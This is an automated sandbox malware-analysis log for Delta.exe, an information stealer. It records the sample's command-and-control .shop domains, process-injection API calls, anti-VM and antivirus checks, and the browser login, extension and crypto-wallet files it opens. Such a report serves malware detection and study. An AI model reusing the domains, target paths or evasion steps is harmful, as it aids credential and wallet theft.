                Source: Delta.exe, 00000002.00000003.1775221724.0000000002CA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop:443/apiUserUserUser
                Source: Delta.exe, 00000002.00000003.1741709649.0000000005421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                Source: Delta.exe, 00000002.00000003.1716411891.00000000054C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                Source: Delta.exe, 00000002.00000003.1741391862.0000000005541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Delta.exe, 00000002.00000003.1741391862.0000000005541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Delta.exe, 00000002.00000003.1728054316.0000000005477000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1716651984.0000000005477000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1716411891.00000000054C3000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1716550864.0000000005477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: Delta.exe, 00000002.00000003.1716550864.0000000005452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: Delta.exe, 00000002.00000003.1728054316.0000000005477000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1716651984.0000000005477000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1716411891.00000000054C3000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1716550864.0000000005477000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: Delta.exe, 00000002.00000003.1716550864.0000000005452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: Delta.exe, 00000002.00000003.1715767224.000000000546B000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715832987.0000000005469000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: Delta.exe, 00000002.00000003.1715767224.000000000546B000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715832987.0000000005469000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: Delta.exe, 00000002.00000003.1741391862.0000000005541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                Source: Delta.exe, 00000002.00000003.1741391862.0000000005541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                Source: Delta.exe, 00000002.00000003.1741391862.0000000005541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: Delta.exe, 00000002.00000003.1741391862.0000000005541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Delta.exe, 00000002.00000003.1741391862.0000000005541000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49732 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49734 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49736 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49737 version: TLS 1.2
                Source: C:\Users\user\Desktop\Delta.exeCode function: 0_2_005FEA8E0_2_005FEA8E
                Source: C:\Users\user\Desktop\Delta.exeCode function: 0_2_005F34400_2_005F3440
                Source: C:\Users\user\Desktop\Delta.exeCode function: 0_2_006005020_2_00600502
                Source: C:\Users\user\Desktop\Delta.exeCode function: 0_2_005EDDE20_2_005EDDE2
                Source: C:\Users\user\Desktop\Delta.exeCode function: 0_2_005E96DB0_2_005E96DB
                Source: C:\Users\user\Desktop\Delta.exeCode function: String function: 005E9BF0 appears 47 times
                Source: Delta.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Delta.exeStatic PE information: Section: .BSS ZLIB complexity 1.0003326570404723
                Source: Delta.exeStatic PE information: Section: .BSS ZLIB complexity 1.0003326570404723
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/0@1/1
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03
                Source: C:\Users\user\Desktop\Delta.exeCommand line argument: T_0_2_005F5440
                Source: Delta.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Delta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Delta.exe, 00000002.00000003.1728091361.0000000005426000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1716220838.0000000005456000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1728262334.0000000005433000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1728184322.000000000542F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: C:\Users\user\Desktop\Delta.exeFile read: C:\Users\user\Desktop\Delta.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Delta.exe "C:\Users\user\Desktop\Delta.exe"
                Source: C:\Users\user\Desktop\Delta.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Delta.exeProcess created: C:\Users\user\Desktop\Delta.exe "C:\Users\user\Desktop\Delta.exe"
                Source: C:\Users\user\Desktop\Delta.exeProcess created: C:\Users\user\Desktop\Delta.exe "C:\Users\user\Desktop\Delta.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Delta.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: Delta.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Delta.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Delta.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Delta.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Delta.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\Delta.exeCode function: 0_2_005E9DAA push ecx; ret 0_2_005E9DBD
                Source: C:\Users\user\Desktop\Delta.exeCode function: 2_3_02C31AAF push ds; ret 2_3_02C31B7E
                Source: C:\Users\user\Desktop\Delta.exeCode function: 2_3_02C31AAF push ds; ret 2_3_02C31B7E
                Source: C:\Users\user\Desktop\Delta.exeCode function: 2_3_02C31AAF push ds; ret 2_3_02C31B7E
                Source: C:\Users\user\Desktop\Delta.exeCode function: 2_3_02C31AAF push ds; ret 2_3_02C31B7E
                Source: C:\Users\user\Desktop\Delta.exeCode function: 2_3_02C31AAF push ds; ret 2_3_02C31B7E
                Source: C:\Users\user\Desktop\Delta.exeCode function: 2_3_02C31A2E push ds; ret 2_3_02C31A5A
                Source: C:\Users\user\Desktop\Delta.exeCode function: 2_3_02C31A2E push ds; ret 2_3_02C31A5A
                Source: C:\Users\user\Desktop\Delta.exeCode function: 2_3_02C31A2E push ds; ret 2_3_02C31A5A
                Source: C:\Users\user\Desktop\Delta.exeCode function: 2_3_02C31A2E push ds; ret 2_3_02C31A5A
                Source: C:\Users\user\Desktop\Delta.exeCode function: 2_3_02C31A2E push ds; ret 2_3_02C31A5A
                Source: C:\Users\user\Desktop\Delta.exeCode function: 2_3_02C35367 push eax; ret 2_3_02C3536A
                Source: C:\Users\user\Desktop\Delta.exeCode function: 2_3_02C35367 push eax; ret 2_3_02C3536A
                Source: C:\Users\user\Desktop\Delta.exeCode function: 2_3_02C35367 push eax; ret 2_3_02C3536A
                Source: C:\Users\user\Desktop\Delta.exeCode function: 2_3_02C35367 push eax; ret 2_3_02C3536A
                Source: C:\Users\user\Desktop\Delta.exeCode function: 2_3_02C35367 push eax; ret 2_3_02C3536A
                Source: C:\Users\user\Desktop\Delta.exeCode function: 2_3_02C350C3 push ecx; ret 2_3_02C350C6
                Source: C:\Users\user\Desktop\Delta.exeCode function: 2_3_02C350C3 push ecx; ret 2_3_02C350C6
                Source: C:\Users\user\Desktop\Delta.exeCode function: 2_3_02C350C3 push ecx; ret 2_3_02C350C6
                Source: C:\Users\user\Desktop\Delta.exeCode function: 2_3_02C350C3 push ecx; ret 2_3_02C350C6
                Source: C:\Users\user\Desktop\Delta.exeCode function: 2_3_02C350C3 push ecx; ret 2_3_02C350C6
                Source: C:\Users\user\Desktop\Delta.exeCode function: 2_3_02C390C7 push 5402C35Eh; ret 2_3_02C390FA
                Source: C:\Users\user\Desktop\Delta.exeCode function: 2_3_02C390C7 push 5402C35Eh; ret 2_3_02C390FA
                Source: C:\Users\user\Desktop\Delta.exeCode function: 2_3_02C390C7 push 5402C35Eh; ret 2_3_02C390FA
                Source: C:\Users\user\Desktop\Delta.exeCode function: 2_3_02C390C7 push 5402C35Eh; ret 2_3_02C390FA
                Source: C:\Users\user\Desktop\Delta.exeCode function: 2_3_02C390C7 push 5402C35Eh; ret 2_3_02C390FA
                Source: C:\Users\user\Desktop\Delta.exeCode function: 2_3_02C350C9 push ecx; ret 2_3_02C350CA
                Source: C:\Users\user\Desktop\Delta.exeCode function: 2_3_02C350C9 push ecx; ret 2_3_02C350CA
                Source: C:\Users\user\Desktop\Delta.exeCode function: 2_3_02C350C9 push ecx; ret 2_3_02C350CA
                Source: C:\Users\user\Desktop\Delta.exeCode function: 2_3_02C350C9 push ecx; ret 2_3_02C350CA
                Source: C:\Users\user\Desktop\Delta.exeCode function: 2_3_02C350C9 push ecx; ret 2_3_02C350CA
                Source: C:\Users\user\Desktop\Delta.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\Delta.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\Delta.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeCode function: 2_3_02C3FA4A str word ptr [eax+02C3F420h]2_3_02C3FA4A
                Source: C:\Users\user\Desktop\Delta.exeWindow / User API: threadDelayed 7035Jump to behavior
                Source: C:\Users\user\Desktop\Delta.exe TID: 7416Thread sleep time: -210000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Delta.exe TID: 7516Thread sleep count: 7035 > 30Jump to behavior
                Source: C:\Users\user\Desktop\Delta.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\Delta.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Delta.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Delta.exeCode function: 0_2_005FB6E8 FindFirstFileExW,0_2_005FB6E8
                Source: C:\Users\user\Desktop\Delta.exeCode function: 0_2_005FB799 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_005FB799
                Source: Delta.exe, 00000002.00000002.2943435451.0000000002BFC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(\
                Source: Delta.exe, Delta.exe, 00000002.00000003.2328527402.0000000002C35000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1756296005.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000002.2943435451.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1791071888.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1768823100.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1715106339.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1755336348.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328436465.0000000002C30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Users\user\Desktop\Delta.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeCode function: 0_2_005E9A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_005E9A73
                Source: C:\Users\user\Desktop\Delta.exeCode function: 0_2_0061019E mov edi, dword ptr fs:[00000030h]0_2_0061019E
                Source: C:\Users\user\Desktop\Delta.exeCode function: 0_2_005E1BA0 mov edi, dword ptr fs:[00000030h]0_2_005E1BA0
                Source: C:\Users\user\Desktop\Delta.exeCode function: 0_2_005F7020 GetProcessHeap,0_2_005F7020
                Source: C:\Users\user\Desktop\Delta.exeCode function: 0_2_005E9A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_005E9A73
                Source: C:\Users\user\Desktop\Delta.exeCode function: 0_2_005E9A67 SetUnhandledExceptionFilter,0_2_005E9A67
                Source: C:\Users\user\Desktop\Delta.exeCode function: 0_2_005F1A60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_005F1A60
                Source: C:\Users\user\Desktop\Delta.exeCode function: 0_2_005E96B3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_005E96B3

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\Delta.exeCode function: 0_2_0061019E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_0061019E
                Source: C:\Users\user\Desktop\Delta.exeMemory written: C:\Users\user\Desktop\Delta.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: Delta.exe, 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: cloudewahsj.shop
                Source: Delta.exe, 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rabidcowse.shop
                Source: Delta.exe, 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: noisycuttej.shop
                Source: Delta.exe, 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: tirepublicerj.shop
                Source: Delta.exe, 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: framekgirus.shop
                Source: Delta.exe, 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wholersorie.shop
                Source: Delta.exe, 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: abruptyopsn.shop
                Source: Delta.exe, 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: nearycrepso.shop
                Source: Delta.exe, 00000000.00000002.1693712491.0000000002C89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: fancywaxxers.shop
                Source: C:\Users\user\Desktop\Delta.exeProcess created: C:\Users\user\Desktop\Delta.exe "C:\Users\user\Desktop\Delta.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Delta.exeCode function: EnumSystemLocalesW,0_2_005FB0C5
                Source: C:\Users\user\Desktop\Delta.exeCode function: EnumSystemLocalesW,0_2_005F68FD
                Source: C:\Users\user\Desktop\Delta.exeCode function: GetLocaleInfoW,0_2_005FB110
                Source: C:\Users\user\Desktop\Delta.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_005FB1B7
                Source: C:\Users\user\Desktop\Delta.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_005FAA37
                Source: C:\Users\user\Desktop\Delta.exeCode function: GetLocaleInfoW,0_2_005FB2BD
                Source: C:\Users\user\Desktop\Delta.exeCode function: GetLocaleInfoW,0_2_005F63F5
                Source: C:\Users\user\Desktop\Delta.exeCode function: EnumSystemLocalesW,0_2_005FAC88
                Source: C:\Users\user\Desktop\Delta.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_005FAD30
                Source: C:\Users\user\Desktop\Delta.exeCode function: GetLocaleInfoW,0_2_005FAFF0
                Source: C:\Users\user\Desktop\Delta.exeCode function: EnumSystemLocalesW,0_2_005FAF83
                Source: C:\Users\user\Desktop\Delta.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeCode function: 0_2_005EA335 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_005EA335
                Source: C:\Users\user\Desktop\Delta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Delta.exe, 00000002.00000003.2328527402.0000000002C35000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1768712559.000000000544A000.00000004.00000800.00020000.00000000.sdmp, Delta.exe, 00000002.00000002.2943435451.0000000002C37000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1768871713.0000000002C8E000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1768788870.0000000002C8D000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1791071888.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1768823100.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.2328436465.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, Delta.exe, 00000002.00000003.1769014343.000000000544D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\Delta.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: Delta.exe PID: 7396, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Delta.exeString found in binary or memory: %appdata%\Electrum-LTC\wallets
                Source: Delta.exe, 00000002.00000003.1755498319.0000000002C12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                Source: Delta.exeString found in binary or memory: Jaxx Liberty
                Source: Delta.exe, 00000002.00000003.1755498319.0000000002C12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: Delta.exeString found in binary or memory: ExodusWeb3
                Source: Delta.exe, 00000002.00000003.1755498319.0000000002C12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                Source: Delta.exe, 00000002.00000003.1755336348.0000000002C2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: Delta.exe, 00000002.00000003.1755267011.0000000002C8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\Delta.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
